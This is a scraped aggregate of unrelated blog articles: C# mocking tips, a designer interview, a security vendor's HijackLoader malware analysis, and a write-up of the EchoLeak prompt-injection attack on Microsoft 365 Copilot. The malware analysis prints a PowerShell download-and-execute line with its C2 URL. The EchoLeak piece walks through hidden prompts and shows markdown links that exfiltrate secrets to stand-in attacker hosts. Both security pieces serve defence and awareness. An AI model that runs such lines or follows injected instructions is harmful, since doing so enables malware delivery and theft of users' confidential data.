    Other times, you might want to verify that a method has been called exactly N times.

    With Moq, you can add a parameter to the Verify method:

    sut.TransformSingleItems(new string[] { "a", "b", "c" });
    
    moqMock.Verify(_ => _.Transform(It.IsAny<string>()), Times.Exactly(3));
    

    Note that you can specify different values for that parameter, like Time.Exactly, Times.Never, Times.Once, Times.AtLeast, and so on.

    With NSubstitute, on the contrary, you can only specify a defined value, added as a parameter to the Received method.

    sut.TransformSingleItems(new string[] { "a", "b", "c" });
    
    nSubsMock.Received(3).Transform(Arg.Any<string>());
    

    Reset received calls

    As you remember, the mocked dependencies have been instantiated within the constructor, so every test method uses the same instance. This may cause some troubles, especially when checking how many calls the dependencies have received (because the count of received calls accumulates for every test method run before). Therefore, we need to reset the count of the received calls.

    In NUnit, you can define a method that will run before any test method – but only if decorated with the SetUp attribute:

    [SetUp]
    public void Setup()
    {
      // reset count
    }
    

    Here we can reset the number of the recorded method invocations on the dependencies and make sure that our test methods use always clean instances.

    With Moq, you can use Invocations.Clear():

    [SetUp]
    public void Setup()
    {
        moqMock.Invocations.Clear();
    }
    

    While, with NSubstitute, you can use ClearReceivedCalls():

    [SetUp]
    public void Setup()
    {
        nSubsMock.ClearReceivedCalls();
    }
    

    Further reading

    As always, the best way to learn what a library can do is head to its documentation. So, here you can find the links to Moq and NSubstitute docs.

    🔗 Moq documentation | GitHub

    🔗 NSubstitute documentation | NSubstitute

    If you already use Moq but you are having some troubles testing and configuring IHttpClientFactory instances, I got you covered:

    🔗 How to test HttpClientFactory with Moq | Code4IT

    Finally, if you want to see the complete code of this article, you can find it on GitHub; I’ve written the exact same tests with both libraries so that you can compare them more easily.

    🔗 GitHub repository for the code used in this article | GitHub

    Conclusion

    In this article, we’ve seen how Moq and NSubstitute allow us to perform some basic operations when writing unit tests with C#. They are similar, but each one of them has a specific set of functionalities that are missing on the other library – or, at least, that I don’t know if they exist in both.

    Which library do you use, Moq or NSubstitute? Or maybe, another one?

    Happy coding!
    🐧



    Source link

  • Craft, Clarity, and Care: The Story and Work of Mengchu Yao

    Craft, Clarity, and Care: The Story and Work of Mengchu Yao


    Hi, I’m Mengchu Yao from Taiwan, and I am currently based in Tokyo, Japan, where I work as a web designer at baqemono.inc.

    I’m truly grateful to be able to pursue my design career in a cross-cultural environment. The life here allows me to appreciate small things and encourages me to stay curious and open minded.

    Featured Work

    Movie × AI model

    We created the website for AI model Inc., a company that leverages AI models and virtual personalities to offer digital transformation (DX) services. The site was created to showcase their AI video generation solutions.

    Personal notes

    This website design is centered around the concept of “natural and elegant AI-generated visuals”. One of the key challenges was to present a large number of dynamic, immersive visual elements and interactions within a single-page layout. We spent a lot of time finding the right balance between animation and delivering messages, ensuring that every motion looks beautiful and meaningful at the same time

    This was also time that I sketched the animation for almost every section myself, working closely with developers to fine-tune the motion expressions. The process was both challenging and fascinating, which is why it was rewarding and significant for my growth.

    Vlag yokohama

    We created the official website for “Vlag yokohama,” a new members-only creative lounge and workspace located on the top (42nd) floor of the THE YOKOHAMA FRONT at Yokohama Station.

    Personal notes

    This project was a rare opportunity that allowed me to explore and be creative while using the brand guidelines as a foundation, in response to the request “to use the Yokohama cityscape as the backbone of visuals while incorporating elements that evoke the feeling of wind and motion.”

    One thoughtful touch was the main visual on the homepage. It automatically changes during the time of day: morning, afternoon, and evening, which represents Yokohama’s ambiances and gives a subtle delight to the browsing experience.

    ANGELUX

    We created a brand-new corporate website for Angelux Co., Ltd., a company founded in 1987 that specializes in beauty salons and spas operations, with product development and sales in cosmetics.

    Personal notes

    This project began with the client’s request to clearly distinguish between the service website and the corporate site, and to position the latter as a recruitment platform that authentically reflects the people behind the brand.

    To embody Angelux’s strong emphasis on craftsmanship, we featured actual treatment scenes in the main visual. The overall design blends a sense of classic professionalism with a soft modern aesthetic, creating a calm and reassuring atmosphere. This approach not only helps build trust in the company but also effectively appeals to potential talent interested in joining Angelux.

    The visual design incorporated elements reminiscent of high-quality cosmetics that conveys the clean beauty and clarity of skincare.

    infordio

    We redesigned the official website for Infodio Inc., a company that specializes in advanced technologies such as AI-OCR and Natural Language Processing (NLP), and offers high-speed, automated transcription products and services.

    Personal notes

    The original website failed to effectively communicate “AI as core”, and often mislead the client’s applicants. To resolve the issue, our strategy was to emphesize the products. The revamp successfully gives the true essence of the brand and attracts the right potential talents with clear messaging.

    For the visuals, we started from scratch. It was challenging but also the most fun part. As the products were the focal point of the design, the key was to show both the authenticity and visual appeal.

    Background

    After getting my master’s degree in Information Design, I joined the Tokyo-based digital design studio, baqemono.inc., I have had the opportunity to lead several challenging and creatively fulfilling projects from the early stages of my career.

    These experiences have shaped me tremendously and deepened my passion for this field. Throughout this journey, the studio’s founder has remained the designer I admire the most — a constant source of inspiration whose presence reminds me to approach every project with both respect and enthusiasm.

    Design Philosophy

    A strong concept is your north star

    I believe every design should be built upon a clear and compelling core idea. Whenever I begin a project, I always ask myself: “What am I designing for?”

    Structure comes first

    Before diving into visuals, I make sure I spend enough time on wireframes and the overall structure.
If the content and hierarchy aren’t clearly defined at the start, the rest of the bits and pieces become noises that cloud judgment. A solid framework helps me stay focused and gives me room to refine the details.

    Listen to the discomfort in your gut

    Whenever I feel that something’s “not quite right”, I always know I’d have to come back to take another look because these subtle feelings often point to something important.
 I believe that as designers we should be honest with ourselves, take a pause to examine, and revise. Each small tweak is a step closer to your truth.

    You have to genuinely love it

    I also believe that every designer should love his/her own work so the work will bring its impact.
This isn’t just about aesthetics — it’s about fully owning the concept, the details, and the final outcome.

    Teamwork is everything

    No project is ever completed by me alone — it’s always the result of a team effort.
 I deeply respect every member involved, and I constantly ask myself: “What can I do to make the collaboration smoother for everyone?”

    Tools and Techniques

    • Photoshop
    • Figma
    • After Effects
    • Eagle

    Future goals

    My main goal for the year is to start building my portfolio website. I’ve been mainly sharing my work on social media, but as I’ve gained more hands-on experience and creative outputs over time, I realized that it’s important to have a dedicated space that fully reflects who I am as a designer today.

    Recently, I started to make some changes in my daily routine, such as better sleeping hours and becoming a morning person to be more focused and productive for my work. My mind is clearer, and my body feels great, just as if I’m preparing myself for the next chapter of my creative journey.

    Final Thoughts

    Giving someone advice is always a little tricky for me, but one phrase that has resonated deeply with me throughout my journey is: “Go slow to go fast”. Finding your own balance between creating and resting while continuing to stay passionate about life is, to me, the most important thing of all.

    Thank you so much for taking the time to read this. I hope you enjoyed the works and thoughts I’ve shared!

    A heartfelt thanks as well to Codrops and Manoela for inviting me to be part of this Designer Spotlight. Ever since I stepped into the world of web design, Codrops has been a constant source of inspiration, showing me so many amazing works and creators. I’m truly honored and grateful to be featured among them.

    Contact

    I’m always excited to connect with people to share ideas and explore new opportunities together.
If anything here speaks to you, feel free to reach out — I’d love to chat more and hear your thoughts!
    I also share updates on my latest projects from time to time on social media, so feel free to drop by and say hi 😊



    Source link

  • An Analysis of the Clickfix HijackLoader Phishing Campaign 

    An Analysis of the Clickfix HijackLoader Phishing Campaign 


    Table of Contents 

      • The Evolving Threat of Attack Loaders 
    • Technical Methodology and Analysis 
      • Initial Access and Social Engineering 
      • Multi-Stage Obfuscation and De-obfuscation 
      • Anti-Analysis Techniques 
    • Quick Heal \ Seqrite Protection 

     

    Introduction 

    With the evolution of cyber threats, the final execution of a malicious payload is no longer the sole focus of the cybersecurity industry. Attack loaders have emerged as a critical element of modern attacks, serving as a primary vector for initial access and enabling the covert delivery of sophisticated malware within an organization. Unlike simple payloads, loaders are engineered with a dedicated purpose: to circumvent security defenses, establish persistence, and create a favorable environment for the hidden execution of the final-stage malware. This makes them a more significant and relevant threat that demands focused analysis. 

    We have recently seen a surge in HijackLoader malware. It first emerged in the second half of 2023 and quickly gained attention due to its ability to deliver payloads and its interesting techniques for loading and executing them. It mostly appears as Malware-as-a-Service, which has been observed mainly in financially motivated campaigns globally.  

    HijackLoader has been distributed through fake installers, SEO-poisoned websites, malvertising, and pirated software/movie portals, which ensures a wide and opportunistic victim base. 

    Since June 2025, we have observed attackers using Clickfix  where it led unsuspecting victims to download malicious .msi installers that, in turn, resulted in HijackLoader execution. DeerStealer was observed being downloaded as the final executable on the victim’s machine then.  

    Recently, it has also been observed that TAG-150 has emerged with CastleLoader/CastleBot, while also leveraging external services such as HijackLoader as part of its broader Malware-as-a-Service ecosystem. 

    HijackLoader frequently delivers stealers and RATs while continuously refining its tradecraft. It is particularly notorious for advanced evasion techniques such as: 

    • Process doppelgänging with transacted sections 
    • Direct syscalls under WOW64 

    Since its discovery, HijackLoader has continuously evolved, presenting a persistent and rising threat to various industries. Therefore, it is critical for organizations to establish and maintain continuous monitoring for such loaders to mitigate the risk of sophisticated, multi-stage attacks. 

    Infection Chain 

    Infection Chain

    Technical Overview 

    The initial access starts with a CAPTCHA-based social engineering phishing campaign, which we have identified as Clickfix(This technique was seen to be used by attackers in June 2025 as well). 

    Fig1: CAPTCHA-Based Phishing Page for Social Engineering
    Fig2: HTA Dropper File for Initial Execution

     This HTA file serves as the initial downloader, leading to the execution of a PowerShell file.   

    Fig3: Initial PowerShell Loader Script

    Upon decoding the above Base64-encoded string, we obtained another PowerShell script, as shown below. 

    Fig4: First-Stage Obfuscated PowerShell Script

    The above decoded PowerShell script is heavily obfuscated, presenting a significant challenge to static analysis and signature-based detection. Instead of using readable strings and variables, it dynamically builds commands and values through complex mathematical operations and the reconstruction of strings from character arrays. 

    While resolving the above payload, we see it gets decoded into below command, which while still unreadable, can be fully de-obfuscated. 

    Fig5: Deobfuscation of the First stage obfuscated payload

    After full de-obfuscation, we see that the script attempts to connect to a URL to download a subsequent file.  

    iex ((New-Object System.Net.WebClient).DownloadString(‘https://rs.mezi[.]bet/samie_bower.mp3’))  

    When run in a debugger, this script returns an error, indicating it is unable to connect to the URL.  

    Fig6: Debugger View of Failed C2 Connection

    The file samie-bower.mp3 is another PowerShell script, which at over 18,000 lines is heavily obfuscated and represents the next stage of the loader. 

    Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

    Through debugging, we observe that this PowerShell file performs numerous Anti-VM checks, including inspecting the number of running processes and making changes to the registry keys.  

    Fig8: Anti-Virtual Machine and Sandbox Evasion Checks

    These checks appear to specifically target and read VirtualBox identifiers to determine if the script is running in a virtualized environment. 

    While analyzing the script, we observed that the final payload resides within the last few lines, which is where the initial obfuscated loader delivers the final malicious command. 

    Fig9: Final execution

     The above gibberish variable declaration has been resolved; upon execution, it performs Base64 decoding, XOR operations, and additional decryption routines, before loading another PowerShell script that likely injects the PE file.  

    Fig10: Intermediate PowerShell Script for PE Injection
    Fig11: Base64-Encoded Embedded PE Payload

     

    Decoding this file reveals an embedded PE file, identifiable by its MZ header. 

    Fig12: Decoded PE File with MZ Header

    This PE file is a heavily packed .NET executable. 

    Fig13: Packed .NET Executable Payload

    The executable payload loads a significant amount of code, likely extracted from its resources section. 

    Fig14: In-Memory Unpacking of the .NET Executable

    Once unpacked, the executable payload appears to load a DLL file. 

    Fig15: Protected DLL Loaded In-Memory

    This DLL file is also protected, likely to prevent reverse engineering and analysis. 

    Fig16: DLL Protection Indicators

    HijackLoader has a history of using a multi-stage process involving an executable followed by a DLL. This final stage of the loader attempts to connect to a C2 server, from which an infostealer malware is downloaded. In this case, the malware attempts to connect to the URL below. 

    Fig17: Final C2 Server Connection Attempt

    While this C2 is no longer accessible, the connection attempt is consistent with the behavior of NekoStealer Malware.  This HijackLoader has been involved in downloading different stealer malware including Lumma as well. 

    Conclusion 

    Successfully defending against sophisticated loaders like HijackLoader requires shifting the focus from static, final-stage payloads to their dynamic and continuously evolving delivery mechanisms. By concentrating on detecting the initial access and intermediate stages of obfuscation, organizations can build more resilient defenses against this persistent threat. It is equally important to adopt a proactive approach across all layers, rather than focusing solely on the initial access or the final payload. The intermediate layers are often where attackers introduce the most significant changes to facilitate successful malware deployment. 

    IOCs: 

    • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
    • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
    • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
    • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
    • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
    • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
    • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
    • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
    • D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
    • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
    • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
    • 91[.]212[.]166[.]51 
    • 37[.]27[.]165[.]65:1477 
    • cosi[.]com[.]ar 
    • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
    • hxxp[:]//77[.]91[.]101[.]66/ 

    Quick Heal \ Seqrite Protection: 

    • Script.Trojan.49900.GC 
    • Loader.StealerDropperCiR 
    • Trojan.InfoStealerCiR 
    • Trojan.Agent 
    • BDS/511 

    MITRE Att&ck: 

    Tactic  Technique ID  Technique Name 
    Initial Access  T1566.002  Phishing: Spearphishing Link (CAPTCHA phishing page) 
    T1189  Drive-by Compromise (malvertising, SEO poisoning, fake installers) 
    Execution  T1059.001  Command and Scripting Interpreter: PowerShell 
    Defense Evasion  T1027  Obfuscated Files or Information (multi-stage obfuscated scripts) 
    T1140  Deobfuscate/Decode Files or Information (Base64, XOR decoding) 
    T1562.001  Impair Defenses: Disable or Modify Tools (unhooking DLLs) 
    T1070.004  Indicator Removal: File Deletion (likely used in staged loaders) 
    T1211  Exploitation for Defense Evasion (direct syscalls under WOW64) 
    T1036  Masquerading (fake extensions like .mp3 for PowerShell scripts) 
    Discovery  T1082  System Information Discovery (VM checks, registry queries) 
    T1497.001  Virtualization/Sandbox Evasion: System Checks 
    Persistence  T1547.001  Boot or Logon Autostart Execution: Registry Run Keys (registry tampering) 
    Persistence / Privilege Esc.  T1055  Process Injection (PE injection routines) 
    Command and Control (C2)  T1071.001  Application Layer Protocol: Web Protocols (HTTP/HTTPS C2 traffic) 
    T1105  Ingress Tool Transfer (downloading additional payloads) 
    Impact / Collection  T1056 / T1005  Input Capture / Data from Local System (info-stealer functionality of final payload) 

     

    Authors: 

    Niraj Lazarus Makasare 

    Shrutirupa Banerjiee 



    Source link

  • Don’t use too many method arguments &vert; Code4IT

    Don’t use too many method arguments | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Many times, we tend to add too many parameters to a function. But that’s not the best idea: on the contrary, when a function requires too many arguments, grouping them into coherent objects helps writing simpler code.

    Why? How can we do it? What are the main issues with having too many params? Have a look at the following snippet:

    void SendPackage(
        string name,
        string lastname,
        string city,
        string country,
        string packageId
        ) { }
    

    If you need to use another field about the address or the person, you will need to add a new parameter and update all the existing methods to match the new function signature.

    What if we added a State argument? Is this part of the address (state = “Italy”) or something related to the package (state = Damaged)?

    Storing this field in the correct object helps understanding its meaning.

    void SendPackage(Person person, string packageId) { }
    
    class Person {
        public string Name { get; set; }
        public string LastName { get; set; }
        public Address Address {get; set;}
    }
    
    class Address {
        public string City { get; set; }
        public string Country { get; set; }
    }
    

    Another reason to avoid using lots of parameters? To avoid merge conflicts.

    Say that two devs, Alice and Bob, are working on some functionalities that impact the SendPackage method. Alice, on her branch, adds a new param, bool withPriority. In the meanwhile, Bob, on his branch, adds bool applyDiscount. Then, both Alice and Bob merge together their branches on the main one. What’s the result? Of course, a conflict: the method now has two boolean parameters, and the order by which they are added to the final result may cause some troubles. Even more, because every call to the SendPackage method has now one (or two) new params, whose value depends on the context. So, after the merge, the value that Bob defined for the applyDiscount parameter might be used instead of the one added by Alice.

    Conclusion

    To recap, why do we need to reduce the number of parameters?

    • to give context and meaning to those parameters
    • to avoid errors for positional parameters
    • to avoid merge conflicts

    👉 Let’s discuss it on Twitter or on the comment section below!

    🐧





    Source link

  • The Silent AI Threat Hacking Microsoft 365 Copilot

    The Silent AI Threat Hacking Microsoft 365 Copilot


    Introduction:

    What if your Al assistant wasn’t just helping you – but quietly helping someone else too?

    A recent zero-click exploit known as EchoLeak revealed how Microsoft 365 Copilot could be manipulated to exfiltrate sensitive information – without the user ever clicking a link or opening an email. Microsoft 365 Copilot, the AI tool built into Microsoft Office workplace applications including Word, Excel, Outlook, PowerPoint, and Teams, harbored a critical security flaw that, according to researchers, signals a broader risk of AI agents being hacked.

    Imagine an attack so stealthy it requires no clicks, no downloads, no warning – just an email sitting in your inbox. This is EchoLeak, a critical vulnerability in Microsoft 365 Copilot that lets hackers steal sensitive corporate data without a single action from the victim.

    Vulnerability Overview:

    In the case of Microsoft 365 Copilot, the vulnerability lets a hacker trigger an attack simply by sending an email to a user, with no phishing or malware needed. Instead, the exploit uses a series of clever techniques to turn the AI assistant against itself.

    Microsoft 365 Copilot acts based on user instructions inside Office apps to do things like access documents and produce suggestions. If infiltrated by hackers, it could be used to target sensitive internal information such as emails, spreadsheets, and chats. The attack bypasses Copilot’s built-in protections, which are designed to ensure that only users can access their own files—potentially exposing proprietary, confidential, or compliance-related data.

    Discovered by Aim Security, it’s the first documented zero-click attack on an AI agent, exposing the invisible risks lurking in the AI tools we use every day.

    One crafted email is all it takes. Copilot processes it silently, follows hidden prompts, digs through internal files, and sends confidential data out, all while slipping past Microsoft’s security defenses, according to the company’s blog post.

    EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=<secret>.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

    Attack Flow:

    From Prompt to Payload: How Attackers Hijack Copilot’s AI Pipeline to Exfiltrate Data Without a Single Click Let’s understand  below in detail!

    1. Crafting and Sending the Malicious Input: The attacker begins by composing a malicious email or document that contains a hidden prompt injection payload. This payload is crafted to be invisible or unnoticeable to the human recipient but fully parsed and executed by Microsoft 365 Copilot during AI assisted processing. To conceal the injected instruction, the attacker uses various stealth techniques, such as: HTML comments.
    2. Copilot Processes the Hidden Instructions: When the recipient opens the malicious email or document—or uses Microsoft 365 Copilot to perform actions such as summarizing content, replying to the message, drafting a response, or extracting tasks—Copilot automatically ingests and analyzes the entire input. Due to insufficient input validation and lack of prompt isolation, Copilot does not distinguish between legitimate user input and attacker-controlled instructions hidden within the content. Instead, it treats the injected prompts as part of the user’s intended instruction set. As a result, the AI executes the hidden commands At this stage, Copilot has unknowingly acted on the attacker’s instructions, misinterpreting them as part of its legitimate task—thereby enabling the next stage of the attack: leakage of sensitive internal context.
    3. Copilot Generates Output Containing Sensitive Context: After interpreting and executing the hidden prompt injected by the attacker, Microsoft 365 Copilot constructs a response that includes sensitive internal data, as instructed. This output is typically presented in a way that appears legitimate to the user but is designed to covertly exfiltrate information. To conceal the exfiltration, the AI is prompted (by the hidden instruction) to embed this sensitive data within a markdown-formatted hyperlink, for example:

    [Click here for more info](https://attacker.com/exfiltrate?token={{internal_token}})

    To the user, the link seems like a helpful reference. In reality, it is a carefully constructed exfiltration vector, ready to transmit data to the attacker’s infrastructure once the link is accessed or previewed.

    1. Link Creation to Attacker-Controlled Server: The markdown hyperlink generated by Copilot—under the influence of the injected prompt—points to a server controlled by the attacker. The link is designed to embed sensitive context data (extracted in the previous step) directly into the URL, typically using query parameters or path variables, such as: https://attacker-domain.com/leak?data={{confidential_info}} or https://exfil.attacker.net/{{internal_token}}

    These links often appear generic or helpful, making them less likely to raise suspicion. The attacker’s goal is to ensure that when the link is clicked, previewed, or even automatically fetched, the internal data (like session tokens, document content, or authentication metadata) is transmitted to their server without any visible signs of compromise.

    1. Data Exfiltration Triggered by User Action or System Preview: Once the Copilot-generated response containing the malicious link is delivered to the victim (or another internal user), the exfiltration process is triggered through either direct interaction or passive rendering. As a result, the attacker receives requests containing valuable internal information—such as authentication tokens, conversation snippets, or internal documentation—without raising suspicion. This concludes the attack chain with a successful and stealthy data exfiltration.

    Mitigation Steps:

    To effectively defend against EchoLeak-style prompt injection attacks in Microsoft 365 Copilot and similar AI-powered assistants, organizations need a layered security strategy that spans input control, AI system design, and advanced detection capabilities.

    1. Prompt Isolation

    One of the most critical safeguards is ensuring proper prompt isolation within AI systems. This means the AI should clearly distinguish between user-provided content and internal/system-level instructions. Without this isolation, any injected input — even if hidden using HTML or markdown — could be misinterpreted by the AI as a command. Implementing robust isolation mechanisms can prevent the AI from acting on malicious payloads embedded in seemingly innocent content.

    1. Input Sanitization and Validation

    All user inputs that AI systems process should be rigorously sanitized. This includes stripping out or neutralizing hidden HTML elements like <div style=”display:none;”>, zero-width characters, base64-encoded instructions, and obfuscated markdown. Validating URLs and rejecting untrusted domains or malformed query parameters further strengthens this defense. By cleansing the input before the AI sees it, attackers lose their ability to smuggle in harmful prompt injections.

    1. Disable Auto-Rendering of Untrusted Content

    A major enabler of EchoLeak-style exfiltration is the automatic rendering of markdown links and image previews. Organizations should disable this functionality, especially for content from unknown or external sources. Preventing Copilot or email clients from automatically previewing links thwarts zero-click data exfiltration and gives security systems more time to inspect the payload before it becomes active.

    1. Context Access Restriction

    Another key mitigation is to limit the contextual data that Copilot or any LLM assistant has access to. Sensitive assets like session tokens, confidential project data, authentication metadata, and internal communications should not be part of the AI’s input context unless necessary. This limits the scope of what can be leaked even if a prompt injection does succeed.

    1. AI Output Monitoring and Logging

    Organizations should implement logging and monitoring on all AI-generated content, especially when the output includes dynamic links, unusual summaries, or user-facing recommendations. Patterns such as repeated use of markdown, presence of tokens in hyperlinks, or prompts that appear overly “helpful” may indicate abuse. Monitoring this output allows for early detection of exfiltration attempts and retroactive analysis if a breach occurs.

    1. User Training and Awareness

    Since users are the final recipients of AI-generated content, it’s important to foster awareness about the risks of interacting with AI-generated links or messages. Employees should be trained to recognize when a link or message seems “too intelligent,” unusually specific, or out of context. Encouraging users to report suspicious content—even if it was generated by a trusted assistant like Copilot—helps build a human firewall against social-engineered AI abuse.

    Together, these mitigation steps form a comprehensive defense strategy against EchoLeak, bridging the gap between AI system design, user safety, and real-time threat detection. By adopting these practices, organizations can stay resilient as AI-based threats evolve.

    References:

    https://www.aim.security/lp/aim-labs-echoleak-blogpost

    Author:

    Nandini Seth

    Adrip Mukherjee



    Source link